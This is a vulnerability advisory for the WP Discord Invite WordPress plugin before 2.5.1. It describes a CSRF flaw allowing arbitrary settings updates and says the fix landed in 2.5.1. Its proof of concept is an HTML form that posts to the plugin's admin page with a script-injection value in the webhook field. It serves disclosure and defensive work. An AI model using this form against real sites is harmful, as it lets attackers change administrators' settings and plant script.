WordPress Plugin Vulnerabilities

WP Discord Invite < 2.5.1 - Arbitrary Settings Update via CSRF

Description

The plugin does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to perform actions on their behalf by tricking a logged in administrator to submit a crafted request.

Proof of Concept

<html>
	<body>
		<form method="POST" action="http://127.0.0.1/wp-admin/admin.php?page=wp-discord-invite-count">
			<input type="hidden" name="wp-discord-invite-oauth" value="1"/>
			<input type="hidden" name="webhook" value='"><script>alert(1);</script>'/>
			<input type="submit" value="Submit">
		</form>
	</body>
<html>

Affects Plugins

Fixed in 2.5.1

References

Classification

Miscellaneous

Original Researcher
Enrico Marcolini, Claudio Marchesini
Submitter
Enrico Marcolini, Claudio Marchesini
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-09-26 (about 7 months ago)
Added
2023-09-26 (about 7 months ago)
Last Updated
2023-09-26 (about 7 months ago)

Other